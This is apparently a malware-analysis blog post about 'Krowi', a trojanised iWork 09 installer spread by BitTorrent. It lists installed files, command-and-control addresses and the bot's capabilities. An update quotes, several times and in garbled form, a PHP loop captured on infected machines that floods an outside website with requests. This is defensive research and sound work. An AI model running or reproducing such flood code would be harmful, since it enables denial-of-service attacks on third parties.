Threat Researcher

Let’s call the bad iWork as Krowi.

So, the story starts when OS X user will download an iWork 09 installation package with serial key through BitTorrent.

Take note that  Krowi is often found on a package “iWork09.zip” with filesize 450.4MB. Upon extracting, you’ll find  NO “iWorkServices” here instead a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the content of “iWork09Trial.mpkg” you’ll find nasty Krowi “iWorkServices.pkg” piggybacking.

The file “preflight” contains a one line instruction, which is executing the mach-o binary file “iworkservices”.

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keep a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find “iWorkServices” process is running in background and it will persistently attempts to report to its command and control channels.

69.92.177.146:59201

qwfojzlk.freehostia.com:1024

Krowi is a nasty P2P controlled bot that is similar to known Storm Worm.

Infected OS X users machine can be controlled remotely by the bot master.  It can be used to participate in a massive Distributed Denial of Service attack(DDoS) , install further application (like software from Pay-per-Install ), spam and distribute malware and may gather user data.

Looking further, this malware comes with a Lua interpreter which is described as “powerful, fast, light-weight, embeddable scripting language”. This could expand further the capability of the attacker to the affected machine.  An automated master could respond and push PHP script …

Imagine,  load and run!

++++++++++++++++

Update 24th Jan: I just want to link few infection report I found around the net that was able to capture PHP scripts running on their box: 

http://notahat.com/posts/28 

http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190 

 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)  

root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com”); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)